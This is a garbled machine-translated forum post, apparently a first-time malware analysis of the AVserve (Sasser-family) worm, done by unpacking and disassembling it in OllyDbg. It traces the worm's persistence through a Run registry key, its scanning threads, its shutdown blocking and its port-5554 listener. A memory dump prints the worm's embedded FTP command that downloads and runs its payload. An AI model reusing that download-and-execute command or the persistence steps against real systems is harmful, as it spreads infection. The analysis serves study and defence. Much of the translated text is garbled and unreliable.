Preliminary analysis of AVserve viruses
Author: mejy FCG [BCG] [] [] [NUKE DFCG] [IPB]
Disclaimer: This article is for use only, and anyone uses the inappropriate consequences of the techniques involved in this article!
Since I first analyzed the virus, many incorrect places, please hesight! ! !
I have not officially available for the first time! Some places are definitely not very accurate! Please understand the welcome!
Anti-assessment discovers that there are only a few simple functions.
004027CE> B8 DD274000 MOV EAX, 23918_UP.004027DD stops with the OD load program.
When loading, the prompt is compressed! Testing tools don't know any shell, try to take off! In the sensory shell, the sensing case is included in the shell.
Copy, spread the code! After taking off the shell, I feel that my influence is much smaller! I don't know if it is right, first take it first!
Code: ------------------------------------------------ --------------------------------
004027ce> B8 DD274000 MOV EAX, 23918_UP.004027DD
004027D3 8000 28 Add Byte PTR DS: [EAX], 28
004027D6 40 Inc EAX
004027D7 8100 67452301 Add DWORD PTR DS: [EAX], 1234567 // Single step to here, the following code change
004027DD 90 NOP
004027DE A9 521DFF50 TEST EAX, 50FF1D52
004027E3 64: FF35 00000000 Push DWORD PTR FS: [0]
004027EA 64: 8925 00000000 MOV DWORD PTR FS: [0], ESP
004027f1 33c0 xor EAX, EAX
004027F3 8908 MOV DWORD PTR DS: [EAX], ECX
become:
004027ce> B8 DD274000 MOV EAX, 23918_UP.004027DD
004027D3 8000 28 Add Byte PTR DS: [EAX], 28
004027D6 40 Inc EAX
004027D7 8100 67452301 Add DWORD PTR DS: [EAX], 1234567
004027DD B8 10984000 MOV EAX, 23918_UP.00409810 Over the EAX address, then Shift F9
004027E2 50 PUSH EAX
004027E3 64: FF35 00000000 Push DWORD PTR FS: [0] Typical exception
004027EA 64: 8925 00000000 MOV DWORD PTR FS: [0], ESP
004027f1 33c0 xor EAX, EAX
004027F3 8908 MOV DWORD PTR DS: [EAX], ECX
00409810 B8 B18740F0 MOV EAX, F04087B1 parked here
00409815 8D88 82100010 Lea ECX, DWORD PTR DS: [EAX 10001082] 0040981B 8941 01 MOV DWORD PTR DS: [ECX 1], EAX
0040981E 8B5424 04 MOV EDX, DWORD PTR SS: [ESP 4]
00409822 8B52 0C MOV EDX, DWORD PTR DS: [EDX C]
00409825 C602 E9 MOV BYTE PTR DS: [EDX], 0E9
00409828 83C2 05 Add EDX, 5
0040982B 2BCA SUB ECX, EDX
0040982D 894A FC MOV DWORD PTR DS: [EDX-4], ECX
00409830 33C0 XOR EAX, EAX
00409832 C3 RETN Here, I have returned to the system space, I used Ctrl F9 until I
00409833 B8 B18740F0 MOV EAX, F04087B1 can also cancel the above breakpoint, then set it here, then walk in step, the program can reach OEP directly
00409838 64: 8F05 00000000 Pop DWORD PTR FS: [0]
0040983F 83C4 04 Add ESP, 4
00409842 55 Push EBP
00409843 53 PUSH EBX
060010B5 8945 A0 MOV DWORD PTR SS: [EBP-60], EAX See the head characteristics of the PE file.
060010B8 837D A0 00 CMP DWORD PTR SS: [EBP-60], 0
060010BC 75 07 JNZ Short APIHOK.060010C5
060010Be 33c0 xor Eax, EAX
060010C0 E9 92000000 JMP APIHOOK.06001157
. . . First come here for the first time
00340430 85c0 Test Eax, Eax; kernel32.exitprocess
slightly
00340451 C9 Leave
××××××××××××××××××××××××× has a cycle, should be handled IAT
00340403 51 PUSH ECX IAT, input table user32.dll
00340404 FF93 8F120010 Call DWORD PTR DS: [EBX 1000128F] loadingLibrary
0034040A 85C0 Test Eax, EAX
0034040C 74 3A Je Short 00340448
0034040E 8945 FC MOV DWORD PTR SS: [EBP-4], EAX
00340411 8B56 04 MOV EDX, DWORD PTR DS: [ESI 4]
00340414 03D3 Add EDX, EBX
00340416 8B7E 08 MOV EDI, DWORD PTR DS: [ESI 8] 00340419 03FB Add EDI, EBX
0034041B 8B02 MOV EAX, DWORD PTR DS: [EDX]
0034041D 85c0 Test Eax, EAX
0034041F 74 1A JE SHORT 0034043B
00340421 52 Push EDX
00340422 8B02 MOV EAX, DWORD PTR DS: [EDX]
00340424 03C3 Add Eax, EBX
00340426 50 Push EAX
00340427 FF75 FC Push DWORD PTR SS: [EBP-4]
0034042A FF93 93120010 Call DWORD PTR DS: [EBX 10001293]
00340430 85c0 Test Eax, EAX
00340432 74 14 Je Short 00340448
00340434 AB Stos DWORD PTR ES: [EDI]
00340435 5A POP EDX
00340436 83C2 04 Add EDX, 4
00340439 ^ EB E0 JMP SHORT 0034041B
I have come here.
003401C0 8B4E 2C MOV ECX, DWORD PTR DS: [ESI 2C]
003401C3 8B56 24 MOV EDX, DWORD PTR DS: [ESI 24]
003401C6 0356 08 Add EDX, DWORD PTR DS: [ESI 8]
003401C9 6A 40 PUSH 40
003401CB 68 00100000 PUSH 1000
003401D0 51 PUSH ECX
003401d1 6a 00 Push 0
003401D3 FF12 Call DWORD PTR DS: [EDX]
003401D5 8985 8B120010 MOV DWORD PTR SS: [EBP 1000128B], EAX
003401dB 56 Push ESI This several functions are restored input tables, should be.
003401DC E8 D7030000 CALL 003405B8 Follow it to discover, it will copy the input table, and some other shells.
003401E1 56 PUSH ESI
003401E2 E8 DF040000 CALL 003406C6
003401E7 56 PUSH ESI
003401E8 E8 CB020000 CALL 003404B8
003401ed 56 PUSH ESI
003401EE E8 62020000 Call 00340455
003401F3 8B4E 34 MOV ECX, DWORD PTR DS: [ESI 34]
003401F6 85C9 Test ECX, ECX has been F8 single step to come below
004098AE 8985 21110010 MOV DWORD PTR SS: [EBP 10001121], EAX; 23918_UP.
004098B4 8BF0 MOV ESI, EAX
004098B6 59 POP ECX
Slightly
004098C9 59 POP ECX
004098CA 5B POP EBX
004098CB 5D POP EBP
004098CC FFE0 JMP EAX This jumps to the new OEP and the same as the original load.
004027 CE> 55 Push EBP This time the entry point turns this.
I have a shelling level, the theory thing I will go to the door!
004027CF 8BEC MOV EBP, ESP
004027D1 6A FF PUSH -1
004027D3 68 28514000 Push 23918_UP.00405128
You can Dump program in the entry point, then use ImportRec to fix it, the program is successful. But you recommend you to patch before running.
Take off, let's analyze the workflow of the virus. After fixing, use OD to load the shelling program, look at his input table basically know
How did he work. After the OD is loaded, Ctrl n searches for the name in the current module!
In order to see its process, we f8 single step, step by step. Forgot to say, this virus wrote with VC.
00402896 |. 50 push eax This is the VC program running character, F4 here
00402897 |. E8 4EF7FFFF CALL dumped_.00401FEA F7 to enter, or else run the virus directly
00401FEA / $ 55 Push EBP enters the above CALL
00401feb |. 8bec Mov EBP, ESP
00401FED |. 51 Push ECX
00401fee |. 51 Push ECX
00401FEF |. 56 Push ESI
00401FF0 |. FF15 44504000 Call DWORD PTR DS: [<& kernel32.GettickCou>; [GettickCount
The above is time to run the system since startup.
00401ff6 |. 50 Push EAX
00401ff7 |. E8 22f0ffffffFFFFFFFFFFFFFFFFFFFFFFFFFF CALL DUMPED_.0040101E
The above CALL effect is to save time to memory [406f20].
00401ffc |. 6a 01 Push 1
00401ffe |. E8 6e000000 Call Dumped_.00402071
×××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××
Follow up on the top of the above. Look at what it is to do.
00402071 / $ 55 Push EBP
00402072 | 8bec Mov EBP, ESP00402074 |. 81ec 24080000 SUB ESP, 824
0040207A |. 56 Push ESI
0040207B |. Be 00040000 MOV ESI, 400
00402080 |. 8D85 DCF7FFFFFFFFFFE EAX, DWORD PTR SS: [EBP-824]
00402086 |. 56 Push ESI; / BUFSIZE => 400 (1024.)
00402087 |. 50 push eax; | Pathbuffer
00402088 |. 6a 00 push 0; | hmodule = null
0040208A |. FF15 34504000 Call DWORD PTR DS: [<& Kernel32.getModulef>; / getModuleFileNamea Get the program handle
00402090 | 8D85 DCFBFFFFE EAX, DWORD PTR SS: [EBP-424]
00402096 |. 56 Push ESI; / BUFSIZE => 400 (1024.)
00402097 |. 50 push eax; | buffer
00402098 | FF15 4C504000 Call DWORD PTR DS: [<& Keer32.GetWindows>; / getWindowsDirectorya gets a Windows installation directory
0040209E |. 8D85 DCFBFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFIA
004020A4 |. 50 push eax
004020A5 |. E8 96000000 Call Dumped_.00402140 This function did, did not understand, there is not much role
004020AA |. 80BC05 DBFBFFF> CMP BYTE PTR SS: [EBP EAX-425], 5C
004020B2 |. 59 POP ECX
004020B3 |. 5E POP ESI
004020B4 |. 74 13 Je Short Dumped_.004020C9
004020B6 |. 8D85 DCFBFFFFFFE EAX, DWORD PTR SS: [EBP-424]
004020BC |. 68 B06A4000 Push Dumped_.00406AB0
004020C1 |. 50 push eax
004020C2 |. E8 F9050000 Call Dumped_.004026c0
Here, let's take a look at the memory.
004068C8 20 69 40 00 18 69 40 00 10 69 40 00 08 69 40 00 i @ .i @ .i @ .i @.
004068D8 00 69 40 00 F8 68 40 00 F0 68 40 00 E8 68 40 00. @. 鴋 @. Sugar @. 鑘 @.
004068E8 31 35 30 20 4F 4B 0A 00 32 30 20 4F 4B 0A 00 150 ok..200 ok ..
004068F8 32 32 36 20 4F 4B 0A 00 32 33 30 20 4F 4B 0A 00 226 ok..230 ok ..
00406908 33 33 31 20 4F 4B 0A 00 32 32 30 20 4F 4B 0A 00 331 ok..220 ok ..
00406918 61 76 73 65 72 76 65 00 61 76 73 65 72 76 65 2E Avserve.AVServe. Program Name
00406928 65 78 65 00 65 63 68 6F 20 6F 66 66 26 65 63 68 Exe.echo OFF & ECH
00406938 6F 20 6F 70 65 6e 20 25 73 20 35 35 35 34 3e 3e Open% S 5554 >>
00406948 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 61 6E 6F cmd.ftp & echo ANO
00406958 6e 79 6D 6F 75 73 3e 3e 63 6D 64 2E 66 74 70 26 NYMOUS >> CMD.FTP &
00406968 65 63 68 6F 20 75 73 65 72 26 65 63 68 6F 20 62 ECHO USER & ECHO B
00406978 69 6e 3e 3e 63 6d 64 2e 66 74 70 26 65 63 68 6F in >> CMD.FTP & ECHO
00406988 20 67 65 74 20 25 69 5F 75 70 2e 65 78 65 3e 3e get% i_up.exe >>
00406998 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 62 79 65 cmd.ftp & echo bye
004069A8 3E 3e 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 6F >> CMD.FTP & ECHO O
004069B8 6E 26 66 74 70 20 2D 73 3A 63 6D 64 2E 66 74 70 N & ftp -s: cmd.ftp
004069C8 26 25 69 5F 75 70 2E 65 78 65 26 65 63 68 6F 20 &% i_up.exe & echo
004069D8 6F 66 66 26 64 65 6C 20 63 6D 64 2E 66 74 70 26 OFF & DEL CMD.FTP &
004069E8 65 63 68 6F 20 6F 6e 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00727.
004069F8 30 2E 30 2E 31 00 00 0.0.1 ...% S% c ....
00406A08 5C 5C 25 73 5C 69 70 63 24 00 00 00 EB 06 //% S / IPC $ ... ??
This should be something that is broken (estimated)
004026C0 / $ 8B4C24 04 MOV ECX, DWORD PTR SS: [ESP 4]
Omit some part, you can follow up
0040271C |. EB 03 JMP Short Dumped_.00402721
0040271E |> 8D79 FC Lea EDI, DWORD PTR DS: [ECX-4] 00402721 |> 8B4C24 0C MOV ECX, DWORD PTR SS: [ESP C] Avserve.exe virus another copy of this name
00402725 |. F7C1 03000000 Test ECX, 3
Some part
0040279f /. C3 RETN
004020C7 |. 59 POP ECX
004020c8 |. 59 POP ECX
004020C9 |> FF35 C8684000 Push DWORD PTR DS: [4068C8]; DUMPED_.00406920
004020cf |. 8D85 DCFBFFFFFFFFE EAX, DWORD PTR SS: [EBP-424]
004020d5 |. 50 push eax
004020d6 |. E8 E5050000 Call Dumped_.004026c0
004020db |. 807d 08 00 CMP BYTE PTR SS: [EBP 8], 0
004020DF |. 59 POP ECX
004020E0 |. 59 POP ECX
004020E1 |. 74 16 Je Short Dumped_.004020F9 To determine if your Windows installation directory does not have the AVserve.exe file without copying
004020E3 |. 8D85 DCFBFFFFFE EAX, DWORD PTR SS: [EBP-424]
004020E9 |. 6a 00 push 0; / failifexists = false
004020eb |. 50 push eax; | NewFileName
004020 EC |. 8D85 DCF7FFFFFFFFE EAX, DWORD PTR SS: [EBP-824];
004020f2 |. 50 push eax; | EXISTINGFILENAME
004020F3 |. FF15 48504000 Call DWORD PTR DS: [<& kernel32.copyfilea >>; / CopyFilea Automatic copy
004020F9 |> 8D45 FC LEA EAX, DWORD PTR SS: [EBP-4]
004020FC |. 50 push eax; / phaldle
004020FD |. 68 806a4000 push dumped_.00406a80; | Subkey = "Software / Microsoft / Windows / CurrentVersion / Run"
00402102 |. 68 02000080 PUSH 80000002; | HKEY = HKEY_LOCAL_MACHINE
00402107 | FF15 04504000 CALL DWORD PTR DS: [<& advapi32.RegOpenKey>; / RegOpenKeyA here is very obvious change your registry, the program itself to start automatically perform 0040210D | 8D85 DCFBFFFF LEA EAX, DWORD PTR SS:.. [EBP- 424]
00402113 |. 50 push eax
00402114 |. E8 27000000 Call Dumped_.00402140
00402119 |. 59 POP ECX
0040211a |. 50 push eax; / bufsize
0040211b |. 8d85 DCFBFFFFFFE EAX, DWORD PTR SS: [EBP-424];
00402121 |. 50 push eax; | buffer
00402122 |. 6a 01 push 1; | valueType = reg_sz
00402124 |. 6a 00 push 0; | reserved = 0
00402126 |. Ff35 c8684000 push dword PTR DS: [4068C8]; | VALUENAME = "avserve.exe"
0040212C |. FF75 FC Push DWORD PTR SS: [EBP-4]; | HKEY
0040212F |. FF15 08504000 Call DWORD PTR DS: [<& Advapi32.RegSetValu>; / RegSetValueexa
00402135 |. FF75 FC Push DWORD PTR SS: [EBP-4]; / HKEY
00402138 |. FF15 0C504000 Call DWORD PTR DS: [<& Advapi32.RegCloseke>; / RegCloseKey
0040213e |. C9 Leave
0040213f /. C3 RETN is over. Go back to the following bad things
×××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××
00402003 |. 59 POP ECX
00402004 |. 59 POP ECX
00402005 |. E8 1ef0ffffffffffff call Dumped_.00401028
0040200A |. 33F6 XOR ESI, ESI
0040200c |. 68 746A4000 Push Dumped_.00406a74; / mutexname = "jobaka3l"
00402011 |. 56 push esi; | initialowner => false
00402012 |. 56 push esi; | psecurity => null00402013 |. Ff15 40504000 Call DWORD PTR DS: [<& kernel32.createmute>; / createmutexa
Create a semaphore, what is the purpose?
00402019 |. FF15 3C504000 Call DWORD PTR DS: [<& kernel32.getlasterr "; [getLastError
0040201F |. 3D B7000000 CMP EAX, 0B7
00402024 |. 75 07 JNZ Short Dumped_.0040202d This If you jump, the virus will start to start.
00402026 |. 33c0 xor Eax, EAX
00402028 |. 5E POP ESI
00402029 |. C9 Leave
0040202A |. C2 1000 RETN 10
0040202D |> 53 Push EBX
0040202E |. 8D45 FC Lea Eax, DWORD PTR SS: [EBP-4]
00402031 |. 57 Push EDI
00402032 | 8B3D 38504000 MOV EDI, DWORD PTR DS: [<& kernel32.createt>; kernel32.createthread
Create a thread
00402038 |. 50 Push Eax; / PThreadID
00402039 |. 56 Push ESI; | CREATIONFLAGS
0040203a |. 56 push esi; | PTHREADPARM
0040203b |. 68 6A1E4000 Push Dumped_.00401E6A; | THREADFUNCTION = Dumped_.00401E6A Thread Function Seed Function
00402040 |. 56 Push ESI; | Stacksize
00402041 |. 56 Push ESI; | Psecurity
00402042 | FFD7 Call Edi; / CreateThread
00402044 |. BB 80000000 MOV EBX, 80 loop creation 0x80 = 128 threads
00402049 |> 8D45 F8 / Lea EAX, DWORD PTR SS: [EBP-8]
0040204C |. 50 | Push Eax
0040204d |. 56 | Push ESI
0040204e |. 56 | Push ESI
0040204F |. 68 F51E4000 | Push Dumped_.00401ef500402054 |. 56 | Push ESI
00402055 |. 56 | Push ESI
00402056 |. FFD7 | Call Edi
00402058 |. 4b | DEC EBX loop creation
00402059 |. ^ 75 EE / jnz short dumped_.00402049 Here you don't change! Don't have it to come to 128, one is enough for you to analyze
0040205b |. 5f Pop Edi
0040205c |. 5b POP EBX
0040205D |> 56 Push ESI; / MACHINENAME
0040205E |. Ff15 00504000 Call DWORD PTR DS: [<& Advapi32.Abortsyste>; / AbortsystemShutdowna is turned off with this function.
00402064 |. 68 b80b0000 push 0bb8; / timeout = 3000. MS
00402069 | FF15 1C504000 Call DWORD PTR DS: [<& kernel32.sleep>]; / sleep sleeps for a while
It seems that it doesn't stop when you sleep, and go to the thread function.
0040206f /. ^EB EC JMP short dumped_.0040205d
Thread function
00401E6A /. 55 Push EBP
00401E6b |. 8bec Mov EBP, ESP
00401E6D |. 83ec 14 SUB ESP, 14
00401E70 |. 56 Push ESI
00401E71 |. 33F6 XOR ESI, ESI
00401E73 |. 57 Push EDI
00401E74 |. 56 Push ESI; / Protocol => ipproto_ip
00401E75 |. 6A 01 Push 1; | TYPE = SOCK_STREAM
00401E77 |. 6a 02 push 2; | Family = AF_INET
00401E79 |. FF15 F0504000 Call DWORD PTR DS: [<& WS2_32.Socket>]; / Socket Creating Socket
00401E7F |. 8BF8 MOV EDI, EAX
00401E81 |. 83FF FF CMP EDI, -1
00401E84 |. 75 08 JNZ Short Dumped_.00401E8E
00401E86 |> 5F POP EDI
00401E87 |. 33c0 XOR EAX, EAX
00401E89 |. 5E POP ESI00401E8A |. C9 Leave
00401E8B |. C2 0400 RETN 4
00401E8E |> 68 B2150000 Push 15b2; / Netshort = 15b2
00401E93 |. 66: C745 EC 020> MOV WORD PTR SS: [EBP-14], 2; |
00401E99 |. FF15 EC504000 Call DWORD PTR DS: [<& WS2_32.htons>]; / NTOHS This function seems to be a port conversion,
Network programming can not say
00401E9f |. 66: 8945 EE MOV WORD PTR SS: [EBP-12], AX
00401EA3 |. 8D45 EC Lea Eax, DWORD PTR SS: [EBP-14]
00401EA6 |. 6A 10 push 10; / addrlen = 10 (16.)
00401EA8 |. 50 push eax; | PSockAddr
00401EA9 |. 57 Push EDI; | Socket
00401EAA |. 8975 F0 MOV DWORD PTR SS: [EBP-10], ESI; |
00401EAD |. FF15 18514000 Call DWORD PTR DS: [<& WS2_32.Bind>]; / bind Binds a SOCKET
00401EB3 |. 83F8 FF CMP EAX, -1
00401EB6 |. 74 0e Je Short Dumped_.00401ec6
00401EB8 |. 6a 05 Push 5; / backlog = 5
00401EBA |. 57 Push EDI; | Socket
00401EBB |. FF15 FC504000 Call DWORD PTR DS: [<& WS2_32.Listen>]; / Listen Monitoring, Queue Length is 5
What is the online cattle know?
00401 EC1 |. 83f8 ff cmp eax, -1 jumps below,
00401EC4 |. 75 09 JNZ Short Dumped_.00401ecf
00401EC6 |> 57 Push EDI; / SOCKET
00401EC7 |. FF15 00514000 Call DWORD PTR DS: [<& WS2_32.CloseSocket >>; / CloseSocket Close Socket
After doing bad things, I haven't forgotten this!
00401 ECD |. ^ EB B7 JMP short dumped_.00401e86
Jump from above to below
00401ECF |> 56 / Push ESI; / PADDRLEN00401ED0 |. 56 | Push ESI; | PSockAddr
00401ed1 |. 57 | Push EDI; | Socket
00401ed2 |. FF15 E4504000 | Call DWORD PTR DS: [<& WS2_32.Accept>]; / accept Accept connection, here should forget
The program is here, not moving, can't debug down, because I didn't find the goal.
But see if you look down, you should be an IP address and try to attack. How do I don't have analyze it. It's not much wrong with it.
00401ed8 |. 8D4D FC | Lea ECX, DWORD PTR SS: [EBP-4]
00401edb |. 51 | Push ECX; / PTHREADID
00401edc |. 56 | Push ESI; | CREATIONFLAGS
00401edd |. 50 | Push Eax; | PTHREADPARM
00401EDE |. 68 031B4000 | Push Dumped_.00401B03; | ThreadFunction = DUMPED_.00401B03
00401EE3 |. 56 | Push ESI; | Stacksize
00401EE4 |. 56 | Push ESI; | Psecurity
00401EE5 |. FF15 38504000 | Call DWORD PTR DS: [<& Kernel32.createthr>; / CreateTHRead
00401EEB |. 6A 19 | Push 19; / Timeout = 25. MS
00401EED | CALL DWORD PTR DS: [<& kernel32.sleep>]; / SLEEP
00401ef3 /. ^EB DA / JMP Short Dumped_.00401ecf
00401ef5. 83ec 54 SUB ESP, 54
00401ef8. 53 Push EBX
00401ef9. 55 Push EBP
00401EFA. 8B2D DC504000 MOV EBP, DWORD PTR DS: [<& user32.wsprintfa>; user32.wsprintfa
Here you will omit a part
00401fbb. 8BCE MOV ECX, ESI
00401fbd. F7F9 IDIV ECX
00401FBF. 52 Push EDX
00401FC0> 8D4424 20 LEA EAX, DWORD PTR SS: [ESP 20] 00401FC4. 68 4C6A4000 PUSH DUMPED_.00406A4C; ASCII "% i.% I.% I.% I"
IP address format 哟
00401FC9. 50 Push EAX
00401FCA. FFD5 Call EBP
00401FCC. 83C4 18 Add ESP, 18
00401FCF. 8D4424 10 LEA EAX, DWORD PTR SS: [ESP 10]
00401fd3. 50 push eax
00401FD4. E8 39FAFFFF CALL DUMPED_.00401A12
00401FD9. 59 POP ECX
00401fda. 68 fa000000 push 0fa; / timeout = 250. MS
00401FDF. FF15 1C504000 Call DWORD PTR DS: [<& kernel32.sleep>]; / SLEEP
Will you do this soon
00401FE5. ^ E9 1dfffffffff jmp Dumped_.00401f07
-------------------------------------------------- ------------------------------
At this point, the analysis is complete! As for how the virus uses a vulnerability to achieve the shell, the level is limited and some reason is not analyzed, and it is interested in research.
Finally, it is enough to write a process of writing a destroying system here! However, the consequences thus triggered I am not responsible!
I feel a little smashing! But after all, I was the first time to analyze the virus, I would like to share with you! The virus is so simple!
Please keep your integrity!
http://bbs.ped.com/showthread.php?s=a0b9f4c265d2aed622acf3c42ac92e9f&threadid=397
